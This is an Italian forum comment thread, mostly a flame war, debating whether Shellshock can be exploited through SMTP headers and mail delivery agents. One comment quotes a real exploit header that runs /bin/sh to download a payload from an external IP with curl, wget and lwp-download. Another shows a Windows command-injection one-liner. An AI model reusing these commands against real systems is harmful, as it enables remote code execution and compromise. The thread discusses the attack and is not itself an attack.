            Forse non hai capito è proprio perchè ho letto e proprio perchè il mio (come praticamente quasi tutti) sistema non ha shell per smtp che so che non funziona!Ora ripeti con me:Non c'è attacco via shell che funzioni se non c'è shell.Quello che è chiaro (se leggi invece che trollare) è che non è affatto il server SMTP a essere coinvolto ma piuttosto l'exploit spera di trovare un agent di delivery e non il server smtp (tipo procmail ad esempio) che abbia acXXXXX ad una shell (ad esempio tramite un file del tipo ".forward" o similia o tipo "mailman") .Cosa che è tutto fuorchè scontata.N.B.Se tu fossi un pochino più sveglio ti saresti accorto di questa riga che dice:"References:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget"Lo vedi quel "/bin/sh"? si?Sai quante pernacchie ti fa un sistema "normalmente" configurato?N.B.Il "/bin/sh" (che non richiama tra l'altro neppure esplicitamente bash che sarebbe casomai /bin/bash dato che non è scontato (tranne che su Apple) che sia linkato a /bin/bash) ti dice che è una pessima idea in ogni caso avere agent di delivery che fanno uso di shell scripts sia che tu usi Bash sia che tu usi un altra shell !!!!!! E siamo quindi daccapo... ovvero la "niubbo configuration" degli agent di delivery (non dell'SMTP).Come dicevo oltre a postare Link bisogna almeno saper Leggere!
          • maxsix scrive:
            Re: ma nvedi sto
            - Scritto da: archimandrito
            Forse non hai capito è proprio perchè ho letto e
            proprio perchè il mio (come praticamente quasi
            tutti) sistema non ha shell per smtp che so che
            non
            funziona!
            Ora ripeti con me:
            Non c'è attacco via shell che funzioni se non c'è
            shell.
            Ripeti con me sonofCollione <b
            Many of those vulnerable configurations are on forgotten systems, long considered stable and which may be difficult to patch. </b
            Cioè andato uno ne arriva uno peggio?Eddai... [cit.]
          • archimandrito scrive:
            Re: ma nvedi sto
            Ripeti tu con me:Il "/bin/sh" (che non richiama tra l'altro neppure esplicitamente bash che sarebbe casomai /bin/bash dato che non è scontato (tranne che su Apple)Hai notato l'ultima parola?
          • maxsix scrive:
            Re: ma nvedi sto
            - Scritto da: archimandrito
            Ripeti tu con me:

            Il "/bin/sh" (che non richiama tra l'altro
            neppure esplicitamente bash che sarebbe casomai
            /bin/bash dato che non è scontato (tranne che su
            Apple)

            Hai notato l'ultima parola?Sei di coccio.Ciao collione come va oggi?Ti vedo in formissima oggi.
  • maxsix scrive:
    Ma le patch?
    Aho cantinari, com'è sta storia?Delle 2 una:1) Alfonso e la sua fonte si stanno divertendo a vedere dove shellshock poteva arrivare con una macchina non patchata e ci prendono per il naso....2) Le patch non funzionano / non sono affidabili / non vengono applicate e quindi siamo punto e a capo.
    • Passante scrive:
      Re: Ma le patch?
      - Scritto da: maxsix
      Aho cantinari, com'è sta storia?
      Delle 2 una:
      1) Alfonso e la sua fonte si stanno divertendo a
      vedere dove shellshock poteva arrivare con una
      macchina non patchata e ci prendono per il
      naso....Alfonso prende in gio sè stesso, il mestiere del giornalista, inconsapevolmente e conseguentemente, prende per il naso i lettori.Sconsiglio fortemente la lettura di qualsiasi suo articolo.
    • Winner scrive:
      Re: Ma le patch?
      La patch si chiama Windows server.Pretendi troppo da volontari informatici pluribocciati. Vuoi la patch? Te la scrivi e te la installi.E zitto.
      • maxsix scrive:
        Re: Ma le patch?
        - Scritto da: Winner
        La patch si chiama Windows server.
        Quindi mi stai dicendo che è meglio spegnere tutti i bidet con Linux e giustiziare sommariamente i vari sysadministrator?Aho, Panda Rossa, questo ce l'ha con te.
        • stronzone scrive:
          Re: Ma le patch?
          beccate er floppete d'er cuoco http://www.tomshw.it/cont/news/apple-sim-snobbata-dagli-operatori-c-e-solo-un-si-in-europa/60202/1.html
          • maxsix scrive:
            Re: Ma le patch?
            - Scritto da: XXXXXXXne
            beccate er floppete d'er cuoco
            http://www.tomshw.it/cont/news/apple-sim-snobbata-Ti aspettavi altro?Io no.Questo è solo l'inizio, un modo per dire agli operatori "tok tok, ehi voi oggi c'è il nuovo ipad con questa cosa e chissenefrega, ma il prossimo iphone 6s/7 ce l'avrà di sicuro. Quindi iniziate a entrare in quell'ordine di idee. Siete avvisati."E il buon detto "uomo avvisato, mezzo salvato" è sempre di gran voga.
          • archimandrito scrive:
            Re: Ma le patch?
            beh c'è avviso e avviso... dipende dalle carte che ha in mano chi "avvisa"...Sai gli operatori funzionano anche senza iphone iphone non funziona senza operatori.. :DIl messaggio degli operatori è chiaro:"senza la -mia- SIM non vai da nessuna parte!". ;)
        • archimandrito scrive:
          Re: Ma le patch?
          Forse ce l'ha con chi non sa neppure che una shell per i server SMTP più diffusi (Sendmail e Postfix ) normalmente non c'è su nessuna distro.Se apri il file passwd (e shadow) vedi questo:postfix:x:AA:BB:Postfix Daemon:/var/spool/postfix:/bin/false
      • archimandrito scrive:
        Re: Ma le patch?
        Non diciamo imbecillate per favore nessun Mailserver bene configurato ha una shell! <b
        postfix:x:AA:BB:Postfix Daemon:/var/spool/postfix:/bin/false </b
      • anonimo scrive:
        Re: Ma le patch?
        Sei veramente intelligente.Peccato che shellshock esiste anche su windows.prova queste linee in una cmd:
        set pippo=pluto^&ping localhost
        echo %pippo%Bye.
      • shoccuccia scrive:
        Re: Ma le patch?
        Che fai? Cambi nick e ti rispondi da solo? Lo hanno capito tutti che sei quell' incompetente di maxmink.
      • azz scrive:
        Re: Ma le patch?
        - Scritto da: Winner
        La patch si chiama Windows server.Quale? Quello con l' interfaccia grafica di wincagotto? :@

        Pretendi troppo da volontari informaticiOcchio alle preposizioni...
        pluribocciati.
        Vuoi la patch? Te la scrivi e te
        la
        installi.Ma come?! Non c' è già winservercagotto 2012 (newbie)? Il server con l' interfaccia grafica metro :D?

        E zitto.(troll4)(troll3)(troll2)
    • 2014 scrive:
      Re: Ma le patch?
      - Scritto da: maxsix
      Aho cantinari, com'è sta storia?

      Delle 2 una:
      2) Le patch non funzionano / non sono affidabili
      / non vengono applicate e quindi siamo punto e a
      capo.Stanno ricompilando il kernel quando avranno finito, forse ti risponderanno... :D
    • stronzone scrive:
      Re: Ma le patch?
      - Scritto da: maxsix
      Aho cantinari, com'è sta storia?c'hanno messo sopra quer mondezza de meccossete (rotfl)
    • archimandrito scrive:
      Re: Ma le patch?
      Ma che state addì ?Non c'è affatto una shell per i daemon di posta SMTP o perlomeno non nei più diffusi (Sendmail e Postfix) .Basterebbe avere aperto almeno una volta il file passwd (e shadow) per rendersene conto.Ad esempio:postfix:x:AA:BB:Postfix Daemon:/var/spool/postfix:/bin/falseQuel "/bin/false" in fondo alla riga dice tutto.Questo ovviamente non esclude che si possano fare script (ad esempio accessibili via http) che richiamano via shell i suddetti servers ma francamente mi paare che siamo sempre nel campo del niubbo.Me in quel caso non è certo colpa del server SMTP che una shell non ce la ha.Si può configurare male ?Certo che si può ma questa è una pessima idea (ieri oggi e domani e con qualunque shell).Vorrei capire (e nessuno me lo ha ancora spiegato) cosa possa spingere qualcuno a esporre una QUALUNQUE shell su un servizio in rete.Se uno è niubbo lo è punto e basta.
    • bubba scrive:
      Re: Ma le patch?
      - Scritto da: maxsix
      Aho cantinari, com'è sta storia?e' semplice. hanno documentato UNA violazione (il resto era spam). io ne farei un articolo sul washington post.quando ce ne saranno 10000 basate sul parsing delle header smtp, ci riguarderemo.
      • maxsix scrive:
        Re: Ma le patch?
        - Scritto da: bubba
        - Scritto da: maxsix

        Aho cantinari, com'è sta storia?
        e' semplice. hanno documentato UNA violazione (il
        resto era spam). io ne farei un articolo sul
        washington
        post.Boh dall'articolo di zdnet non traspare molto sta cosa dell'UNA.Ma ti voglio credere.
        quando ce ne saranno 10000 basate sul parsing
        delle header smtp, ci
        riguarderemo.Beh questo direi che è un caso, dei tanti, che chi sa, sistema e sta zitto il più possibile.Immagina tu le cause.PS: ah, non ti arrabbiare, ho cambiato idea. Non ti credo.
        • archimandrito scrive:
          Re: Ma le patch?
          - Scritto da: maxsix
          Beh questo direi che è un caso, dei tanti, che
          chi sa, sistema e sta zitto il piùTu non sei tra quelli.. il "che sa" ti esclude automaticamente se non hai ancora imparato a leggere e a distinguere "/bin/sh" (che è nell'exploit) e "/bin/bash" hai un problema.
          possibile.
          Immagina tu le cause.C'è poco da immaginare su Mac "/bin/bash" e "/bin/sh" sono la stessa cosa... il che la dice lunga su quanto tu possa "ridere".

          Non
          ti
          credo.Azzzz!Siamo tutti preoccupati da quel che crede o non crede uno che non sa neppure leggere i link che posta!(rotfl)(rotfl)
          • maxsix scrive:
            Re: Ma le patch?
            - Scritto da: archimandrito
            - Scritto da: maxsix


            Beh questo direi che è un caso, dei tanti,
            che

            chi sa, sistema e sta zitto il più

            Tu non sei tra quelli.. il "che sa" ti esclude
            automaticamente

            se non hai ancora imparato a leggere e a
            distinguere "/bin/sh" (che è nell'exploit) e
            "/bin/bash" hai un
            problema.


            possibile.

            Immagina tu le cause.

            C'è poco da immaginare su Mac "/bin/bash" e
            "/bin/sh" sono la stessa cosa... il che la dice
            lunga su quanto tu possa
            "ridere".



            Non

            ti

            credo.
            Azzzz!
            Siamo tutti preoccupati da quel che crede o non
            crede uno che non sa neppure leggere i link che
            posta!
            (rotfl)(rotfl)Ma lol, guarda coso ancient, ti hanno già sbugiardato.Dai collione fai il bravo.
        • bubba scrive:
          Re: Ma le patch?
          - Scritto da: maxsix
          - Scritto da: bubba

          - Scritto da: maxsix


          Aho cantinari, com'è sta storia?

          e' semplice. hanno documentato UNA
          violazione
          (il

          resto era spam). io ne farei un articolo sul

          washington

          post.

          Boh dall'articolo di zdnet non traspare molto sta
          cosa
          dell'UNA.beh se non sai leggere non e' colpa mia. Al limite fatti aiutare da siri.

          quando ce ne saranno 10000 basate sul parsing

          delle header smtp, ci

          riguarderemo.

          Beh questo direi che è un caso, dei tanti, che
          chi sa, sistema e sta zitto il più
          possibile.
          Immagina tu le cause.che chi ha comprato un macmini e ha installato pkg LAMP-like 6 anni fa lo deve reinstallare... internet non cadra' per questo.Cmq piu' seriamente, e' chiaro che la combo header/script parser/bash buggata e' decisamente poco probabile. MA cionondimeno nella miliardata di sistemi running e' certo possibile. Rimarra' sotto il rumore di fondo, a meno che i soliti hacker russi non trovino un qualche pkg/framework buggato che ha una certa diffusione e che nessuno ha patchato (perche' anziano,abbandonato,whatever). Allora magari arrivano tranquillamente a 10000... ma tutte basate sulla stessa cfg di default buggata... cioe' rimane comunque 1 singolo pkg (ancorche' dannoso)...
          PS: ah, non ti arrabbiare, ho cambiato idea. Non
          ti
          credo.hai delle idee tue? whoa. pensavo arrivassero solo con iMessage
          • archimandrito scrive:
            Re: Ma le patch?
            - Scritto da: bubba
            hai delle idee tue? (rotfl)(rotfl)Cerchiamo di essere seri suvvia!
          • maxsix scrive:
            Re: Ma le patch?
            - Scritto da: archimandrito
            - Scritto da: bubba


            hai delle idee tue?
            (rotfl)(rotfl)
            Cerchiamo di essere seri suvvia!Guarda che non ti basta una vita intera per raggiungere le mie vette, figurati una notte di rosicamento, collione.E' proprio una cosa impossibile.
          • archimandrito scrive:
            Re: Ma le patch?
            - Scritto da: maxsix
            Guarda che non ti basta una vita intera per
            raggiungere le mie vette, Ma neanche 3 o 4! Su questo siamo assolutamente d'accordo!(rotfl)(rotfl)(rotfl)
          • collione scrive:
            Re: Ma le patch?
            - Scritto da: maxsix
            Guarda che non ti basta una vita intera per
            raggiungere le mie vette, figurati una notte di
            rosicamento,
            collione.
            ehm, capisco che per un troll clonanick come te è difficile da credere, ma quello è un altro utente
          • collione scrive:
            Re: Ma le patch?
            p.s. quando il tuo bidone colorato riuscirà a fare il 10% delle cose che fa questo qui http://porteus.org/index.phpallora forse ammetterò che hai un pelino ragione
          • maxsix scrive:
            Re: Ma le patch?
            - Scritto da: collione
            p.s. quando il tuo bidone colorato riuscirà a
            fare il 10% delle cose che fa questo qui
            http://porteus.org/index.php
            E quindi?Mi fa così pena vedere tanto sano impegno buttato alle ortiche.Sul serio, non sto scherzando.E poi, bidone colorato?Anche daltonico sei.
            allora forse ammetterò che hai un pelino ragioneIo ho sempre ragione.Ficcatelo bene in quella zucca malata che ti ritrovi.
          • maxsix scrive:
            Re: Ma le patch?
            - Scritto da: bubba
            - Scritto da: maxsix

            - Scritto da: bubba


            - Scritto da: maxsix



            Aho cantinari, com'è sta storia?


            e' semplice. hanno documentato UNA

            violazione

            (il


            resto era spam). io ne farei un articolo
            sul


            washington


            post.



            Boh dall'articolo di zdnet non traspare molto
            sta

            cosa

            dell'UNA.
            beh se non sai leggere non e' colpa mia. Al
            limite fatti aiutare da
            siri.



            quando ce ne saranno 10000 basate sul
            parsing


            delle header smtp, ci


            riguarderemo.



            Beh questo direi che è un caso, dei tanti, che

            chi sa, sistema e sta zitto il più

            possibile.

            Immagina tu le cause.
            che chi ha comprato un macmini e ha installato
            pkg LAMP-like 6 anni fa lo deve reinstallare...
            internet non cadra' per
            questo.
            E cosa centra il mac mini.Cosa centra lamp poi?Mah comunque andiamo avanti.
            Cmq piu' seriamente, e' chiaro che la combo
            header/script parser/bash buggata e' decisamente
            poco probabile. MA cionondimeno nella miliardata
            di sistemi running e' certo possibile. Rimarra'
            sotto il rumore di fondo, a meno che i soliti
            hacker russi non trovino un qualche pkg/framework
            buggato che ha una certa diffusione e che nessuno
            ha patchato (perche'
            anziano,abbandonato,whatever). Allora magari
            arrivano tranquillamente a 10000... ma tutte
            basate sulla stessa cfg di default buggata...
            cioe' rimane comunque 1 singolo pkg (ancorche'
            dannoso)...
            Vedi la questione è che come giustamente viene riportato sta cosa avviene in sistemi "ancient" come quelli di posta che vivono sotto l'egida del "funziona non toccare altrimenti la posta non arriva e sai i XXXXXX...".Quindi si è probabile che questo exploit possa trovare terreno morbido dove attaccarsi.Non ho voglia di mettermi qua a spuliciare su una mia vecchia installazione Debian+qmail di 10 anni fa.Ma sono sicurissimo che quel tipo di installazione ancora oggi gira, eccome se gira.E sono quasi sicuro che i filtri antispam (spamassasin se non ricordo male) girava passando tramite terminale bash.Boh, cantinari, è il vostro mestiere, cercate, trovate e risolvete.Io ho altro da fare.

            PS: ah, non ti arrabbiare, ho cambiato idea. Non

            ti

            credo.
            hai delle idee tue? whoa. pensavo arrivassero
            solo con
            iMessageE figlio mio.... vi siete fatti na brutta idea.Ma va benissimo così.Un abbraccio.
          • archimandrito scrive:
            Re: Ma le patch?
            - Scritto da: maxsix
            Non ho voglia di mettermi qua a spuliciare su una
            mia vecchia installazione Debian+qmail di 10 anni
            fa.1) Se la installazione è tua <b
            fatti tuoi </b
            (e di chi te la ha fatta fare)Se poi hai messo nella home directory di un utente un file ".qmail" che esegue una shell (senza parsare nulla) non avere dubbi e non spulciare! <b
            è sicuro che il sistema è vulnerabile </b
            ma questo anche se non aveva bash!E (fidati) non è vulnerabile ne perchè è vecchio ne perchè c'è bash ma perchè lo ha installato un incapace.

            Ma sono sicurissimo che quel tipo di
            installazione ancora oggi gira, eccome se
            gira.Certo che "gira" tutto sta a vedere "a beneficio di chi gira".Io non credo che tu sappia installarlo ma (ammesso e non conXXXXX) sappi che ci sono <b
            di sicuro almeno 2 colpevoli </b
            chi lo ha installato e chi glielo ha lasciato fare.
            Io ho altro da fare.Certo correre e correre VELOCE! perchè se chi ti ha affidato quella (del tutto ipotetica installazione) ti acchiappa sono "amari"(rotfl)(rotfl)
          • maxsix scrive:
            Re: Ma le patch?
            - Scritto da: archimandrito
            - Scritto da: maxsix



            Non ho voglia di mettermi qua a spuliciare
            su
            una

            mia vecchia installazione Debian+qmail di 10
            anni

            fa.

            1) Se la installazione è tua <b
            fatti
            tuoi </b
            (e di chi te la ha fatta
            fare)A dirla tutta era su dei server miei presso Akamai.Poi sono stati dismessi e ho esternalizzato il tutto ma qualche ricordo l'ho tenuto.Basterebbe virtualizzare l'installazione e guardare, ma non ho ne voglia, ne tempo.Ah, cocco, giusto per mettere qualche puntino sulle i, di solito i lavori io li commissiono ai cantinari come te (schiavizzandoli, lo ammetto) e non viceversa.
            Se poi hai messo nella home directory di un
            utente un file ".qmail" che esegue una shell
            (senza parsare nulla) non avere dubbi e non
            spulciare!
            <b
            è sicuro che il sistema è vulnerabile
            </b
            ma questo anche se non aveva
            bash!
            E (fidati) non è vulnerabile ne perchè è vecchio
            ne perchè c'è bash ma perchè lo ha installato un
            incapace.
            Ecco uno dice che ha fatto una cosa e subito volano gli "incapaci".Dimmi cocco, spiegami veramente, ma tu dopo essere stato ampiamente sbugiardato in questo 3d, pensi di continuare anche su altri o ti fermi qui?Così per sapere eh, sai collione va e viene, etype oramai ha stufato, potresti diventare il nostro nuovo toy boy.Si non ti mettere in testa strane cose ancora eh, un filo di talento sembri averlo, ma non ci fidiamo del primo bauscia che passa per strada.




            Ma sono sicurissimo che quel tipo di

            installazione ancora oggi gira, eccome se

            gira.

            Certo che "gira" tutto sta a vedere "a beneficio
            di chi
            gira".Le installazioni debian+qmail a suo tempo erano diffusissime e tra l'altro qmail è sempre stato il MD più solido che io conosca.Sono sicuro che molte di quelle installazioni fatte a suo tempo sono ancora live e non toccate da quei tempi.
            Io non credo che tu sappia installarlo ma
            (ammesso e non conXXXXX) sappi che ci sono
            <b
            di sicuro almeno 2 colpevoli </b

            chi lo ha installato e chi glielo ha lasciato
            fare.
            Ascolta coso, come ti chiami boh.Partiamo dal presupposto che te più di un Ubuntu e qualche copia e incolla qua e la dell'argomento sui vari forum (ho i link ma non voglio sXXXXXXXrti subito) non sei in grado di fare.Quindi, dimmi.[modo padre ralph on]Qual'è il tuo problema ragazzo?[modo padre ralph off]
          • archimandrito scrive:
            Re: Ma le patch?
            - Scritto da: maxsix
            A dirla tutta era su dei server miei presso
            Akamai.Akamai non fa hosting di "server tuoi"...
            Poi sono stati dismessi e ho esternalizzato il
            tutto ma qualche ricordo l'ho
            tenuto.Le fantasie non sono ricordi.
            Basterebbe virtualizzare l'installazione e
            guardare, ma non ho ne voglia, ne
            tempo.Certo devi correre e VELOCE! :D
            Ah, cocco, giusto per mettere qualche puntino
            sulle i, di solito i lavori io li commissiono ai
            cantinari come te (schiavizzandoli, lo ammetto) e
            non
            viceversa.E "commissioni" roba con .qmail su shell nella directory degli utenti?(rotfl)(rotfl)


            Se poi hai messo nella home directory di un

            utente un file ".qmail" che esegue una shell

            (senza parsare nulla) non avere dubbi e non

            spulciare!

            <b
            è sicuro che il sistema è
            vulnerabile

            </b
            ma questo anche se non aveva

            bash!

            E (fidati) non è vulnerabile ne perchè è
            vecchio

            ne perchè c'è bash ma perchè lo ha
            installato
            un

            incapace.



            Ecco uno dice che ha fatto una cosa e subito
            volano gli
            "incapaci".Beh sai sei tu che hai descritto la situazione io mi limito a prendere atto!
            Sono sicuro che molte di quelle installazioni
            fatte a suo tempo sono ancora live e non toccate
            da quei
            tempi.Se esistono (e sottolineo SE) io invece sono sicuro che le usano i russi (da quei tempi).Come è ovvio che sia dato il tipo di installazione.

            Ascolta coso, come ti chiami boh.Archimandrito .

            Partiamo dal presupposto che te più di un UbuntuMai usato Ubuntu in vita mia neppure per sbaglio.
            Quindi, dimmi.

            [modo padre ralph on]Qual'è il tuo problema
            ragazzo?[modo padre ralph
            off]Nessuno Mica vado in giro a seminare server per gli spammer russi.E tantomeno passo il tempo a correre inseguito dai clienti inferociti perchè gli spammer stanno usando il loro server e i loro soldi!
          • caron scrive:
            Re: Ma le patch?
            poverino, il perfetto esempio del cliente apple, capisci adesso perchè la gente vi disprezza ed il mondo vi piglia per il qulo?
          • bubba scrive:
            Re: Ma le patch?
            cmq giusto per amor del thread... se ti becchi una risposta (sensata, per di piu'! un grande onore) e la rigiri al T1000, poi non ti lamentare se ti trattiamo peggio di ruppolo.
          • maxsix scrive:
            Re: Ma le patch?
            - Scritto da: bubba
            cmq giusto per amor del thread... se ti becchi
            una risposta (sensata, per di piu'! un grande
            onore) e la rigiri al T1000, poi non ti lamentare
            se ti trattiamo peggio di
            ruppolo.Intendiamoci giovane.Io non giro niente a nessuno.Non cedo, non fuggo e non ho bisogno del sostegno di chicchessia.Come ho già detto, basto e avanzo per tutti voi messi insieme.
          • archimandrito scrive:
            Re: Ma le patch?
            - Scritto da: maxsix
            Come ho già detto, basto e avanzo per tutti voiCome comico forse infatti più o meno direi che sei una ottima palestra per principianti.Dove lo trovi un sacco migliore per allenarsi?
          • Sky line scrive:
            Re: Ma le patch?
            A maxsix, occhio che se tutte le risposte che ti sono state date hanno basi ben chiare. Hai perso un po' di freddezza e sei passato al "non sapete chi sono io", "basto per tutti voi"...Gurada che "tutti noi" abbiamo la nostra vita e non cambia per un tuo post su di un blog.Tornando agli argomenti di archimandrito, sono tutti corretti e se tu non vuoi leggere l'articolo di c.net perché non hai tempo *eppur ne hai per scrivere qui* o voglia *infatti, nessuno ti obbliga, ma evita anche di commentare allora* cosa rispondi a fare prendendola sul "personale"?Sei tu che la butti sul personale. Che un server di posta dia l'acXXXXX a bash é un errore. Punto.I manuali bisogna leggerli, ma richiede tempo e tu non ne hai. Infatti ci sono esperti che invece ne fanno la loro professione. Ma siccome tu "schiavizzi" non hai/avrai nessuna possibilitá di assoldarne uno!Auguri...
    • Shiba scrive:
      Re: Ma le patch?
      - Scritto da: maxsix
      2) Le patch non funzionano / non sono affidabili
      / <b
      non vengono applicate </b
      Chi è causa del suo mal... tu le hai applicate le patch? So che non hai un server, ma se lo combini con uno dei tanti buchi di OSX... La prudenza non è mai troppa.
      • archimandrito scrive:
        Re: Ma le patch?
        Più che altro nel suo caso la "prudenza" è inutile.Apple's Shellshock patch for Macs is incompletehttp://www.cnet.com/news/apples-shellshock-patch-incomplete-say-experts/
Chiudi i commenti